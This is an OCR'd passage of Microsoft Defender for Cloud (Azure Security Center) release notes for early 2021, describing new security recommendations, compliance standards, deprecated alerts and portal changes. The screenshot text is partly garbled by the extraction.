fa Inventory 
Controls Unhealthy resources Resource health Actions 
@ workbooks 
V Enable Azure Defender 8 of 25 resources s Q 


& Community 
Azure Arc enabled Kubernetes clusters should have Microsoft Defender's extension enabled = 5 of 18 managed clusters BTT 
Cloud Security dk 


Microsoft Defender for Endpoint integration with Azure Defender 
now supports Windows Server 2019 and Windows 10 on Windows 
Virtual Desktop released for general availability (GA) 


Microsoft Defender for Endpoint is a holistic, cloud delivered endpoint security solution. It provides 
risk-based vulnerability management and assessment as well as endpoint detection and response 
(EDR). For a full list of the benefits of using Defender for Endpoint together with Azure Security Center, 
see Protect your endpoints with Security Center's integrated EDR solution: Microsoft Defender for 


Endpoint. 


When you enable Azure Defender for Servers running Windows Server, a license for Defender for 
Endpoint is included with the plan. If you've already enabled Azure Defender for Servers and you have 
Windows Server 2019 servers in your subscription, they'll automatically receive Defender for Endpoint 


with this update. No manual action is required. 


Support has now been expanded to include Windows Server 2019 and Windows 10 on Windows 


Virtual Desktop. 


© Note 


If you're enabling Defender for Endpoint on a Windows Server 2019 server, ensure it meets the 
prerequisites described in Enable the Microsoft Defender for Endpoint integration. 


Recommendations to enable Azure Defender for DNS and Resource 
Manager (in preview) 


Two new recommendations have been added to simplify the process of enabling Azure Defender for 


Resource Manager and Azure Defender for DNS: 


e Azure Defender for Resource Manager should be enabled - Defender for Resource Manager 
automatically monitors the resource management operations in your organization. Azure 
Defender detects threats and alerts you about suspicious activity. 

e Azure Defender for DNS should be enabled - Defender for DNS provides an additional layer of 
protection for your cloud resources by continuously monitoring all DNS queries from your Azure 
resources. Azure Defender alerts you about suspicious activity at the DNS layer. 


Enabling Azure Defender plans results in charges. Learn about the pricing details per region on 
Security Center's pricing page”. 


Q Tip 


Preview recommendations don't render a resource unhealthy, and they aren't included in the 
calculations of your secure score. Remediate them wherever possible, so that when the preview 
period ends they'll contribute towards your score. Learn more about how to respond to these 
recommendations in Remediate recommendations in Azure Security Center. 


Three regulatory compliance standards added: Azure CIS 1.3.0, 
CMMC Level 3, and New Zealand ISM Restricted 


We've added three standards for use with Azure Security Center. Using the regulatory compliance 
dashboard, you can now track your compliance with: 


e CIS Microsoft Azure Foundations Benchmark 1.3.0 
e CMMC Level 3 
e New Zealand ISM Restricted 


You can assign these to your subscriptions as described in Customize the set of standards in your 
regulatory compliance dashboard. 


Dashboard > Microsoft Defender for Cloud > Security policy 


Add regulatory compliance standards ~ x 


Click Add on the standards that you want to add to the regulatory compliance dashboard and then assign it to the subscription. After completing 
the assignment , the custom policies will be available in the Regulatory compliance dashboard. 


P Search to filter items... 


Name Ty Description TL Ty 
NIST SP 800-53 R4 Track NIST SP 800-53 R4 controls in the Compliance Dashboard, based on a recomme... Add 
NIST SP 800 171 R2 Track NIST SP 800 171 R2 controls in the Compliance Dashboard, based on a recomme... Add 
UKO and UK NHS Track UK OFFICIAL and UK NHS controls in the Compliance Dashboard, based on a rec... Add 
Canada Federal PBMM Track Canada Federal PBMM controls in the Compliance Dashboard, based on a recom... Add 
Azure CIS 1.1.0 Track Azure CIS 1.1.0 controls in the Compliance Dashboard, based on a recommende... Add 
HIPAA HITRUST Track HIPAA/HITRUST controls in the Compliance Dashboard, based on a recommende... Add 
SWIFT CSP CSCF v2020 Track SWIFT CSP CSCF v2020 controls in the Compliance Dashboard, based on a reco... Add 
ISO 27001:2013 Track ISO 27001:2013 controls in the Compliance Dashboard, based on a recommende... Add 
New Zealand ISM Restricted Track New Zealand ISM Restricted controls in the Compliance Dashboard, based on a r... 

CMMC Level 3 Track CMMC Level 3 controls in the Compliance Dashboard, based on a recommended... 

Azure CIS 1.3.0 Track Azure CIS 1.3.0 controls in the Compliance Dashboard, based on a recommende... 


Learn more in: 


e Customize the set of standards in your regulatory compliance dashboard 
e Tutorial: Improve your regulatory compliance 
e FAQ - Regulatory compliance dashboard 


Four new recommendations related to guest configuration (in 
preview) 


Azure's Guest Configuration extension reports to Security Center to help ensure your virtual machines 
in-guest settings are hardened. The extension isn't required for Arc-enabled servers because it's 
included in the Arc Connected Machine agent. The extension requires a system-managed identity on 


the machine. 
We've added four new recommendations to Security Center to make the most of this extension. 


e Two recommendations prompt you to install the extension and its required system-managed 


identity: 


o Guest Configuration extension should be installed on your machines 
o Virtual machines’ Guest Configuration extension should be deployed with system-assigned 
managed identity 


e When the extension is installed and running, it will begin auditing your machines and you'll be 
prompted to harden settings such as configuration of the operating system and environment 
settings. These two recommendations will prompt you to harden your Windows and Linux 
machines as described: 

o Windows Defender Exploit Guard should be enabled on your machines 
o Authentication to Linux machines should require SSH keys 


Learn more in Understand Azure Policy's Guest Configuration. 


CMK recommendations moved to best practices security control 


Every organization's security program includes data encryption requirements. By default, Azure 
customers’ data is encrypted at rest with service-managed keys. However, customer-managed keys 
(CMK) are commonly required to meet regulatory compliance standards. CMKs let you encrypt your 
data with an Azure Key Vault key created and owned by you. This gives you full control and 
responsibility for the key lifecycle, including rotation and management. 


Azure Security Center's security controls are logical groups of related security recommendations, and 
reflect your vulnerable attack surfaces. Each control has a maximum number of points you can add to 
your secure score if you remediate all of the recommendations listed in the control, for all of your 
resources. The Implement security best practices security control is worth zero points. So 
recommendations in this control don't affect your secure score. 


The recommendations listed below are being moved to the Implement security best practices security 
control to better reflect their optional nature. This move ensures that these recommendations are in 


the most appropriate control to meet their objective. 


e Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest 

e Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK) 
e Azure Al services accounts should enable data encryption with a customer-managed key (CMK) 
e Container registries should be encrypted with a customer-managed key (CMK) 

e SQL managed instances should use customer-managed keys to encrypt data at rest 

e SQL servers should use customer-managed keys to encrypt data at rest 

e Storage accounts should use customer-managed key (CMK) for encryption 


Learn which recommendations are in each security control in Security controls and their 


recommendations. 


11 Azure Defender alerts deprecated 


The 11 Azure Defender alerts listed below have been deprecated. 


e New alerts will replace these two alerts and provide better coverage: 


AlertType AlertDisplayName 
ARM_MicroBurstDomainInfo PREVIEW - MicroBurst toolkit "Get-AzureDomainInfo" function run detected 
ARM_MicroBurstRunbook PREVIEW - MicroBurst toolkit "Get-AzurePasswords" function run detected 


e These nine alerts relate to an Azure Active Directory Identity Protection connector (IPC) that has 


already been deprecated: 


AlertType AlertDisplayName 
UnfamiliarLocation Unfamiliar sign-in properties 
AnonymousLogin Anonymous IP address 
InfectedDeviceLogin Malware linked IP address 
ImpossibleTravel Atypical travel 
MaliciousIP Malicious IP address 
LeakedCredentials Leaked credentials 
PasswordSpray Password Spray 
LeakedCredentials Azure AD threat intelligence 
AADAI Azure AD Al 

Q Tip 


These nine IPC alerts were never Security Center alerts. They're part of the Azure Active 
Directory (AAD) Identity Protection connector (IPC) that was sending them to Security 
Center. For the last two years, the only customers who've been seeing those alerts are 
organizations who configured the export (from the connector to ASC) in 2019 or earlier. AAD 
IPC has continued to show them in its own alerts systems and they've continued to be 
available in Azure Sentinel. The only change is that they're no longer appearing in Security 
Center. 


Two recommendations from "Apply system updates” security 
control were deprecated 


The following two recommendations were deprecated and the changes might result in a slight impact 


on your secure score: 


e Your machines should be restarted to apply system updates 
e Monitoring agent should be installed on your machines. This recommendation relates to on- 
premises machines only and some of its logic will be transferred to another recommendation, 


Log Analytics agent health issues should be resolved on your machines 


We recommend checking your continuous export and workflow automation configurations to see 
whether these recommendations are included in them. Also, any dashboards or other monitoring tools 


that might be using them should be updated accordingly. 


Learn more about these recommendations in the security recommendations reference page. 


Azure Defender for SQL on machine tile removed from Azure 
Defender dashboard 


The Azure Defender dashboard's coverage area includes tiles for the relevant Azure Defender plans for 
your environment. Due to an issue with the reporting of the numbers of protected and unprotected 
resources, we've decided to temporarily remove the resource coverage status for Azure Defender for 
SQL on machines until the issue is resolved. 


21 recommendations moved between security controls 


The following recommendations were moved to different security controls. Security controls are logical 
groups of related security recommendations, and reflect your vulnerable attack surfaces. This move 
ensures that each of these recommendations is in the most appropriate control to meet its objective. 


Learn which recommendations are in each security control in Security controls and their 


recommendations. 


Recommendation Change and impact 

Vulnerability assessment should be Moving from Remediate vulnerabilities (worth 6 points) 

enabled on your SQL servers to Remediate security configurations (worth 4 points). 

Vulnerability assessment should be Depending on your environment, these recommendations will have a 
enabled on your SQL managed reduced impact on your score. 

instances 


Vulnerabilities on your SQL databases 
should be remediated new 
Vulnerabilities on your SQL databases 
in VMs should be remediated 


There should be more than one owner Moving to Implement security best practices. 

assigned to your subscription When a recommendation moves to the Implement security best 
Automation account variables should practices security control, which is worth no points, the recommendation 
be encrypted no longer affects your secure score. 

loT Devices - Auditd process stopped 

sending events 

loT Devices - Operating system 

baseline validation failure 

loT Devices - TLS cipher suite upgrade 

needed 

loT Devices - Open Ports On Device 

loT Devices - Permissive firewall policy 

in one of the chains was found 

loT Devices - Permissive firewall rule in 

the input chain was found 

loT Devices - Permissive firewall rule in 

the output chain was found 

Diagnostic logs in loT Hub should be 

enabled 

loT Devices - Agent sending 


Recommendation Change and impact 


underutilized messages 

loT Devices - Default IP Filter Policy 
should be Deny 

loT Devices - IP Filter rule large IP 
range 

loT Devices - Agent message intervals 
and size should be adjusted 

loT Devices - Identical Authentication 
Credentials 

loT Devices - Audited process stopped 
sending events 

loT Devices - Operating system (OS) 
baseline configuration should be fixed 


March 2021 


Updates in March include: 


e Azure Firewall management integrated into Security Center 

e SQL vulnerability assessment now includes the "Disable rule" experience (preview) 

e Azure Monitor Workbooks integrated into Security Center and three templates provided 
e Regulatory compliance dashboard now includes Azure Audit reports (preview) 

e Recommendation data can be viewed in Azure Resource Graph with "Explore in ARG" 

e Updates to the policies for deploying workflow automation 

e Two legacy recommendations no longer write data directly to Azure activity log 

e Recommendations page enhancements 


Azure Firewall management integrated into Security Center 


When you open Azure Security Center, the first page to appear is the overview page. 


This interactive dashboard provides a unified view into the security posture of your hybrid cloud 
workloads. Additionally, it shows security alerts, coverage information, and more. 


As part of helping you view your security status from a central experience, we have integrated the 
Azure Firewall Manager into this dashboard. You can now check Firewall coverage status across all 
networks and centrally manage Azure Firewall policies starting from Security Center. 


Learn more about this dashboard in Azure Security Center's overview page. 
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E E Firewalls Firewall policies Regions with firewalls Controls with the highest potential increase 
Alerts by severity Network protection status [=] Remediate vulnerabilities +10% (6pt) 
pore by resource 
148 [=] Enable encryption at rest +6% (4pt) 
i Virtual hubs A [=] Secure management ports +5% (Spt) 
| 2.24 


View controls > 


Virtual networks 
a 


ERIT RIRID [s25 


Enhance your threat protection capabilities > Improve your network security > 


SQL vulnerability assessment now includes the "Disable rule" 
experience (preview) 


Security Center includes a built-in vulnerability scanner to help you discover, track, and remediate 
potential database vulnerabilities. The results from your assessment scans provide an overview of your 
SQL machines' security state, and details of any security findings. 


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally 
disable it. Disabled findings don't impact your secure score or generate unwanted noise. 


Learn more in Disable specific findings. 


Azure Monitor Workbooks integrated into Security Center and 
three templates provided 


As part of Ignite Spring 2021, we announced an integrated Azure Monitor Workbooks experience in 
Security Center. 


You can use the new integration to start using the out-of-the-box templates from Security Center's 
gallery. By using workbook templates, you can access and build dynamic and visual reports to track 
your organization's security posture. Additionally, you can create new workbooks based on Security 
Center data or any other supported data types and quickly deploy community workbooks from 
Security Center's GitHub community. 


Three templates reports are provided: 


e Secure Score Over Time - Track your subscriptions’ scores and changes to recommendations for 
your resources 

e System Updates - View missing system updates by resources, OS, severity, and more 

e Vulnerability Assessment Findings - View the findings of vulnerability scans of your Azure 


resources 


Learn about using these reports or building your own in Create rich, interactive reports of Security 
Center data. 


Microsoft Defender for Cloud | Workbooks | Secure Score Over Time dr x 


Showing 64 subscriptions 


@ workbooks Ê Edit oO a x © 


? Help 
Y= Top recommendations with recent increase in unhealthy resources (=) Security controls scores over time (weekly) 


Recommendations with the most resources that have become unhealthy in the 
periods shown 


Recommendation name TL Unhealthy count Ty d B Enable MFA 
90% | Encrypt data in transit 
Storage accounts should use customer-managed key (CMK) for 45 dk 
E D Secur nagement... 


Storage accounts should restrict network access using virtual ne 45 


B Restrict unauthorize... 


es pe 
a = B Apply system updates 
Storage account should use a private link connection 45 
A 60% H Enable endpoint pro... 
Storage account public access should be disallowed 42 Sa D Apply adaptive appli.. 


Access to storage accounts with firewall and virtual network con 4 


Windows web servers should be configured to use secure comn 37 


E Remediate security c... 
B Manage access and... 
B Enable auditing and ... 


Disk encryption should be applied on virtual machines 32 20% W Protect your applicat... 
——— =a 

Vulnerabilities in security configuration on your machines shouk 27 10% Mi Remediate vulnerabil... 
— 

nable encryption at... 
B Enab! ryt 

Audit diagnostic setting 20 0% 

Ba 
Feb9 A A EA E Feb17 Feb19 

Log Analytics agent health issues should be resolved on your m. 19 

as | Enable MFA (Last) Encrypt data in transit (Last) Secure management port. Restrict unauthorized net. 
100 = 65.958 « 81.413 « 90.834 « 


Regulatory compliance dashboard now includes Azure Audit 
reports (preview) 


From the regulatory compliance dashboard's toolbar, you can now download Azure and Dynamics 


certification reports. 


Q Microsoft Defender for Cloud | Regulatory compliance 


Showing 2 subscriptions 
Audit reports 


d Download report Œ! Manage compliance policies Ss Open query Compliance over time workbook 


You can select the tab for the relevant reports types (PCI, SOC, ISO, and others) and use filters to find 
the specific reports you need. 


Learn more about Managing the standards in your regulatory compliance dashboard. 


Dashboard > Microsoft Defender for Cloud 


Audit reports (Preview) 


ISO SOC PCI HITRUST US Government Industry & Regional 


Showing 1 to 10 of 12 results 


[2 Search report Region : All | 7 selected ZA | Industry : All 


Title Ty 


Microsoft Azure Dynamics 365 and Online 
Services - ISO 27001 27018 27017 27701 
Assessment Report 12.2.2020 


Microsoft Azure Dynamics 365 and Online 
Services - 1S027001 and 27701 Certificate 
12.18.2020 


Microsoft Azure Dynamics 365 and Online 
Services - ISO 27017 Certificate 12.18.2020 


Microsoft Azure Dynamics 365 and Online 
Services - ISO 27018 Certificate 12.18.2020 


Microsoft Azure + Dynamics 365 and 
Other Online Services - |S027001 and 
27701 Certificate - 8.13.2020 


Downloa n 


e Select all 


d Downl it report for demonstrating Microsoft Azure, Dynamics 365 
Regulatory standard 27701 (PIMS) frameworks. 


E so20000-1 

d Downl demonstrating Microsoft Azure, Dynamics 365, and Other 
@ 1$022301 n Management Systems) framework. 
D £02700: 

+ Downl E 15027017 demonstrating Microsoft Azure, Dynamics 365, and Other 
E so27018 

d Downl ei 1SO27701 demonstrating Microsoft Azure, Dynamics 365, and Other 
D zoen 

d Download Certificate demonstrating Microsoft Azure, Dynamics 365, and Other 


Information Management Systems) framework. 


Standard 


$027001 


$027701 


$027018 


$027001 
$027701 


Recommendation data can be viewed in Azure Resource Graph 


with "Explore in ARG" 


The recommendation details pages now include the "Explore in ARG" toolbar button. Use this button 
to open an Azure Resource Graph query and explore, export, and share the recommendation's data. 


Azure Resource Graph (ARG) provides instant access to resource information across your cloud 


environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to 
query information across Azure subscriptions programmatically or from within the Azure portal. 


Learn more about Azure Resource Graph (ARG). 


Microsoft Defender for SQL should be enabled on your SQL servers x 


D Exempt (©) Enforce CE View policy definition ay Explore in ARG 


Severity 

| High 

v Description 

v Remediation steps 
^ Affected resources 


Unhealthy resources (11) 


Freshness interval 


D 30 Min 2 


View all exemptions 


Healthy resources (42) 


Exempted resources 


Not applicable resources (2) 


JA Search SQL servers 


Name 


E. demosrv 


test-sql-server 


OOO D 


m-test-2 


Ty Subscription 
Demo_R&D 
Demo_R&D 


Demo_R&D 


Updates to the policies for deploying workflow automation 


Automating your organization's monitoring and incident response processes can greatly improve the 


time it takes to investigate and mitigate security incidents. 


We provide three Azure Policy 'DeploylfNotExist' policies that create and configure workflow 


automation procedures so that you can deploy your automations across your organization: 


Goal 


Workflow automation for security 
alerts 


Workflow automation for security 
recommendations 


Workflow automation for 
regulatory compliance changes 


Policy 


Deploy Workflow Automation for Azure 
Security Center alerts E 


Deploy Workflow Automation for Azure 
Security Center recommendations Z 


Deploy Workflow Automation for Azure 
Security Center regulatory compliance £ 


There are two updates to the features of these policies: 


e When assigned, they will remain enabled by enforcement. 


Policy ID 


£1525828-9a90-4fcf-be48- 
268cdd02361e 


73d6ab6c-2475-4850- 
afd6-43795f3492ef 


509122b9-ddd9-47ba- 
a5f1-d0dac20be63c 


e You can now customize these policies and update any of the parameters even after they have 


already been deployed. For example, if a user wants to add another assessment key, or edit an 


existing assessment key, they can do so. 


Get started with workflow automation templates £ . 


Learn more about how to Automate responses to Security Center triggers. 


Two legacy recommendations no longer write data directly to 
Azure activity log 


Security Center passes the data for almost all security recommendations to Azure Advisor, which in 


turn, writes it to Azure activity log. 


For two recommendations, the data is simultaneously written directly to Azure activity log. With this 
change, Security Center stops writing data for these legacy security recommendations directly to 
activity Log. Instead, we're exporting the data to Azure Advisor as we do for all the other 


recommendations. 
The two legacy recommendations are: 


e Endpoint protection health issues should be resolved on your machines 
e Vulnerabilities in security configuration on your machines should be remediated 


If you've been accessing information for these two recommendations in activity log's 
“Recommendation of type TaskDiscovery" category, this is no longer available. 


Recommendations page enhancements 


We've released an improved version of the recommendations list to present more information at a 


glance. 
Now on the page you'll see: 


1. The maximum score and current score for each security control. 

2. Icons replacing tags such as Fix and Preview. 

3. Anew column showing the Policy initiative related to each recommendation - visible when 
"Group by controls" is disabled. 


Controls Max score Current Score © Potential score increase Unhealthy resources Resource health Actions 


> Enable MFA © 10 IRA + 0% (points) None EEE 
> Secure management ports 628 DI + 3% (2 points) 36 of 179 resources EU 
> Remediate vulnerabilities 0.68 I + 9% (5 points) 202 of 244 resources a 
v Apply system updates 6 446 DUI + 3% (2 points) 69 of 279 resources KS 
Log Analytics agent should be installed on your virtual machine © EA none = 
Monitoring agent should be installed on your machines ZO 1 of 1 azure resources Pe 

lytics agent should be installed on your Windows-based Azure Arc machi... d 11 of 15 Azure Arc machines 

Ge, lytics agent should be installed on your Linux-based Azure Arc machines a 17 of 20 Azure Arc machines B 


Æ Search recommendations Recommendation status : 2 Selected Recommendation maturity : All Severity : All Resource type : All Reset filters Group by controls: @ OE 


Response actions : All Contains exemptions : All Initiative AI 


Recommendation Ty Unhealthy resources T4 Resource health Ty | Initiative Ty Actions 


SQL Auditing settings should have Action-Groups configured to capture cri... TZ 1 of 17 azure resources SE | ASB, Azure CIS 1.1.0 
System updates should be installed on your machines BRA 54 of 870 VMs & servers Lal ASB, Azure CIS 1.1.0 + 7 
There should be more than one owner assigned to your subscription ? 2 of 37 subscriptions SSS =a ASB, Canada Fed PBMM + 5 
A System updates should be installed on your machines (powered by Update ... BA 6 of 116 VMs & servers BE 
A Auto provisioning of the Log Analytics agent should be enabled on your su... ? 1 of 25 subscriptions SR | ASB, Azure CIS 1.1.0 
Endpoint protection health issues should be resolved on your machines BEA 28 of 775 VMs & servers = ASB, Azure CIS 1.1.0 + 7 
External accounts with read permissions should be removed from your subs... ? 1 of 39 subscriptions A ASB, Azure CIS 1.1.0 + 5 
Azure DDoS Protection Standard should be enabled > 12 of 610 virtual networks JI ASB, Canada Fed PBMM + 3 Q 
Non-internet-facing virtual machines should be protected with network sec... EA i of 179 virtual machines = ASB 
D Authentication to Linux machines should require SSH keys © BA None EEE | Guest config policies besi 


Learn more in Security recommendations in Azure Security Center. 


February 2021 


Updates in February include: 


e New security alerts page in the Azure portal released for general availability (GA) 

e Kubernetes workload protection recommendations released for general availability (GA) 

e Microsoft Defender for Endpoint integration with Azure Defender now supports Windows Server 
2019 and Windows 10 on Windows Virtual Desktop (in preview) 

e Direct link to policy from recommendation details page 

e SQL data classification recommendation no longer affects your secure score 

e Workflow automations can be triggered by changes to regulatory compliance assessments (in 
preview) 


e Asset inventory page enhancements 


New security alerts page in the Azure portal released for general 
availability (GA) 


Azure Security Center's security alerts page has been redesigned to provide: 


e Improved triage experience for alerts - helping to reduce alerts fatigue and focus on the most 
relevant threats easier, the list includes customizable filters and grouping options. 

e More information in the alerts list - such as MITRE ATT&ACK tactics. 

e Button to create sample alerts - to evaluate Azure Defender capabilities and test your alerts. 
configuration (for SIEM integration, email notifications, and workflow automations), you can 
create sample alerts from all Azure Defender plans. 

e Alignment with Azure Sentinel's incident experience - for customers who use both products, 
switching between them is now a more straightforward experience and it's easy to learn one from 
the other. 

e Better performance for large alerts lists. 

e Keyboard navigation through the alert list. 

e Alerts from Azure Resource Graph - you can query alerts in Azure Resource Graph, the Kusto-like 
API for all of your resources. This is also useful if you're building your own alerts dashboards. 


Learn more about Azure Resource Graph. 


e Create sample alerts feature - To create sample alerts from the new alerts experience, see 
Generate sample Azure Defender alerts. 


Security alerts x 
©) Refresh S ci ge status Vv e Open query ZG Suppression rules g Security alerts map (Preview) © create sample alerts 
Active alerts by severity 


Active alerts Affected resources Ien (166) [Medium (414) [Low (64) 


Ø earch by ID, title, or affected resource Status == Active >) Severity == Low, Medium, High >< Time == Last month >X +7 Add filter 


| No grouping Kd 

a Severity A Alert title ty Affected resource Ty Activity start time (UTC+2) Ty MITRE ATT&CK® tactics Status Ty 

| High O Suspicious process executed [seen .. E CH-VictimVM00-Dev 11/22/20, 3:00 AM E, Credential Access Active 
E | High O Suspicious process executed [seen... EZ CH-Victimvimoo 11/22/20, 1:00 AM E, Credential Access Active 

| High O Suspicious process executed [seen... E dockervm-redhat 11/21/20, 3:00 AM S Credential Access Active 

| High O Suspicious process executed [seen ... EZ dockeroniaasdemo 11/21/20, 1:00 AM E, Credential Access Active 
E | High O Suspicious process executed [seen = samplecrmweblobstor... 11/20/20, 7:00 AM E, Credential Access Active 

| High O Suspicious process executed EZ dockervm-redhat 11/20/20, 6:00 AM S Credential Access Active 
E | High O Suspicious process executed © dockervm-redhat 11/20/20, 5:00 AM E, Credential Access Active 

| High @ Microsoft Defender for Cloud test ale... #8 ASC-AKS-CLOUD-TALK 11/20/20, 3:00 AM GO Persistence Active 

| High O Exposed Kubernetes dashboard det... $% ASC-WORKLOAD-PRO... 11/20/20, 12:00 AM EO Initial Access Active 
C) | High O Suspicious process executed [seen ... EZ cH-VictimvM00-Dev 11/19/20, 7:00 PM E, Credential Access Active 
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Kubernetes workload protection recommendations released for 
general availability (GA) 


We're happy to announce the general availability (GA) of the set of recommendations for Kubernetes 


workload protections. 


To ensure that Kubernetes workloads are secure by default, Security Center has added Kubernetes level 
hardening recommendations, including enforcement options with Kubernetes admission control. 


When Azure Policy for Kubernetes is installed on your Azure Kubernetes Service (AKS) cluster, every 
request to the Kubernetes API server will be monitored against the predefined set of best practices - 
displayed as 13 security recommendations - before being persisted to the cluster. You can then 
configure to enforce the best practices and mandate them for future workloads. 


For example, you can mandate that privileged containers shouldn't be created, and any future requests 
to do so will be blocked. 


Learn more in Workload protection best-practices using Kubernetes admission control. 


O Note 


While the recommendations were in preview, they didn't render an AKS cluster resource 
unhealthy, and they weren't included in the calculations of your secure score. with this GA 


announcement these will be included in the score calculation. If you haven't remediated them 
already, this might result in a slight impact on your secure score. Remediate them wherever 
possible as described in Remediate recommendations in Azure Security Center. 


Microsoft Defender for Endpoint integration with Azure Defender 
now supports Windows Server 2019 and Windows 10 on Windows 
Virtual Desktop (in preview) 


Microsoft Defender for Endpoint is a holistic, cloud delivered endpoint security solution. It provides 
risk-based vulnerability management and assessment as well as endpoint detection and response 
(EDR). For a full list of the benefits of using Defender for Endpoint together with Azure Security Center, 
see Protect your endpoints with Security Center's integrated EDR solution: Microsoft Defender for 


Endpoint. 


When you enable Azure Defender for Servers running Windows Server, a license for Defender for 
Endpoint is included with the plan. If you've already enabled Azure Defender for Servers and you have 
Windows Server 2019 servers in your subscription, they'll automatically receive Defender for Endpoint 


with this update. No manual action is required. 


Support has now been expanded to include Windows Server 2019 and Windows 10 on Windows 


Virtual Desktop. 


© Note 


If you're enabling Defender for Endpoint on a Windows Server 2019 server, ensure it meets the 
prerequisites described in Enable the Microsoft Defender for Endpoint integration. 


Direct link to policy from recommendation details page 


When you're reviewing the details of a recommendation, it's often helpful to be able to see the 
underlying policy. For every recommendation supported by a policy, there's a new link from the 


recommendation details page: 


Management ports should be closed on your virtual machines = x 


GI Exempt ZZ view policy definition 


Severity Freshness interval 


| Medium ® 24 Hours 


v Description 
v Remediation steps 
^ Affected resources 


Unhealthy resources (25) Healthy resources (121) Not applicable resources (42) 


| Search virtual machines 


I Name Ty Subscription 

E E une Contoso Infra1 

O HO gu Contoso Infrat 

O EA srvms4 Rome OMS Dev1 Test 1 


Use this link to view the policy definition and review the evaluation logic. 


If you're reviewing the list of recommendations on our Security recommendations reference guide, 


you'll also see links to the policy definition pages: 


Management ports should be Open remote management ports are exposing your VM to a high level of risk from Internet- Medium 
closed on your virtual machines based attacks. These attacks attempt to brute force credentials to gain admin access to the 


machine. Q 


(Related policy: Management ports should be closed on your virtual machines | 


SQL data classification recommendation no longer affects your 
secure score 


The recommendation Sensitive data in your SQL databases should be classified no longer affects your 
secure score. This is the only recommendation in the Apply data classification security control, so that 
control now has a secure score value of 0. 


For a full list of all security controls in Security Center, together with their scores and a list of the 


recommendations in each, see Security controls and their recommendations. 


Workflow automations can be triggered by changes to regulatory 
compliance assessments (in preview) 


We've added a third data type to the trigger options for your workflow automations: changes to 
regulatory compliance assessments. 


Learn how to use the workflow automation tools in Automate responses to Security Center triggers. 


Dashboard > Microsoft Defender for Cloud > Settings Add workflow automation x 
el Settings | Workflow automation EEE 
Showing 63 subscriptions re b 
ame 
[e Search (Ctrl+/) | « f t t GO Refresh 
Settings 
ba Description 
EET | Filter by name | A Se... En... 
+) Microsoft Defender for Cloud 
plans 
* Auto provisioning Name Ty Status ty Scope 
5 ZO Subscription © 
@ Email notifications t = = 
XG test © Enabled ASC DEMO GE 3 
© integrations OO testSecureScoreCont-. GO Enabled ASC DEMO 


Resource group * © 


ZA Workflow automation 


E Continuous export 


Trigger conditions © 
Choose the trigger conditions that will automatically trigger the configured action. 


Defender for Cloud data type * 


[ Regulatory compliance standards 


Compliance standard * 


Azure-Security-Benchmark 


Compliance control state * 
Passed, Failed 


E) Select all 


E Failed 
PO Passed H 


Skipped 


Unsupported 


[ne 


Asset inventory page enhancements 
Security Center's asset inventory page has been improved in the following ways: 


e Summaries at the top of the page now include Unregistered subscriptions, showing the number 
of subscriptions without Security Center enabled. 


fa Microsoft Defender for Cloud | Inventory 


Showing 64 subscriptions 


» O Refresh -+ Add non-Azure servers E Open query J Assign tags d Download CSV report d ger lo a © Learn more 
| Filter by name | Subscriptions == All Resource Groups == All X Resource types == All X Microsoft Defender == All X 


Agent monitoring == All X Recommendations == All X Contains Exemptions == All X ME Add filter 


Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 


64385 b, 3287 % 41 fo 1 


e Filters have been expanded and enhanced to include: 


o Counts - Each filter presents the number of resources that meet the criteria of each category 


Resource types == All X Microsoft Defender == All X Agent monitoring == All X 


Resource types 


Filter | Resource types ba | 


Operator | == Vv | 


Value 65 selected AN y 


[m] Select all 

E storage account4(555) 

ei gcp resourced (246)| 

v] network security rule do God 
E 


subnet (309) 


ei virtual machines extensions}(295) 
iv | public ip addresses{(239) 


o Contains exemptions filter (Optional) - narrow the results to resources that have/haven't got 
exemptions. This filter isn't shown by default, but is accessible from the Add filter button. 


ashbosrd > Security Center 
Security Center| Inventory i x 
Shomng 63 subsonpsons 
©) Refresh + addnomanreseves TE Open quay ssign tag d Download CSV report JN miga: eo © team more 
Sert zeze Subscriptions == ASC DEMO Resource Groups == AN X = Resourcetypes== All X Azure Defender == AN X 
Agent mon@odng == AN X fecommendations==AN X Tb Add fiter 
Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
"s 1032 4 698 % 3 %0 
o Resource name TA Resource type Ty Subscription TA Agent monitoring A Azure Defender TA, Recommendations TA e 
BE centoso-ans Servers - Azure Arc ASC DEMO O Urmcraces = 
g r comteso-ng Servers - Azure Arc ASC DEMO © unmonaored E 
BN Ar Virtual machine scale sets ASC DEMO O unmontcred On — 
O BD bemad: Virtual machnes ASC DEMO A Partially Monitored On == ~~ 
DI BD erea Virtual machines ASC DEMO A Partially Monitored On pe 
DIE perra Virtual machines ASC DEMO A Partially Montored On — 
C A scttoremidiste Virtual machines ASC DEMO A Partially Monitored On — i 
C B chectcoint-fre- Virtual machines ASC DEMO A Partially Monitored Go — 
OM sv-work Virtual machne: ASC DEMO © wemtored On — = 
DI B beretzen Virtual machines ASC DEMO O urren On —i i @8 8 ~— 
mm... batee markina ronin conte ser nman M «pestea ~ mts 


Learn more about how to Explore and manage your resources with asset inventory. 


January 2021 
Updates in January include: 


e Azure Security Benchmark is now the default policy initiative for Azure Security Center 


e Vulnerability assessment for on-premises and multicloud machines is released for general 
availability (GA) 

e Secure score for management groups is now available in preview 

e Secure score API is released for general availability (GA) 

e Dangling DNS protections added to Azure Defender for App Service 

e Multicloud connectors are released for general availability (GA) 

e Exempt entire recommendations from your secure score for subscriptions and management 
groups 

e Users can now request tenant-wide visibility from their global administrator 

e 35 preview recommendations added to increase coverage of Azure Security Benchmark 

e CSV export of filtered list of recommendations 

e "Not applicable" resources now reported as "Compliant" in Azure Policy assessments 

e Export weekly snapshots of secure score and regulatory compliance data with continuous export 


(preview) 


Azure Security Benchmark is now the default policy initiative for 
Azure Security Center 


Azure Security Benchmark is the Microsoft-authored, Azure-specific set of guidelines for security and 
compliance best practices based on common compliance frameworks. This widely respected 
benchmark builds on the controls from the Center for Internet Security (CIS) % and the National 
Institute of Standards and Technology (NIST) £ with a focus on cloud-centric security. 


In recent months, Security Center's list of built-in security recommendations has grown significantly to 
expand our coverage of this benchmark. 


From this release, the benchmark is the foundation for Security Center's recommendations and fully 
integrated as the default policy initiative. 


All Azure services have a security baseline page in their documentation. These baselines are built on 
Azure Security Benchmark. 


If you're using Security Center's regulatory compliance dashboard, you'll see two instances of the 
benchmark during a transition period: 


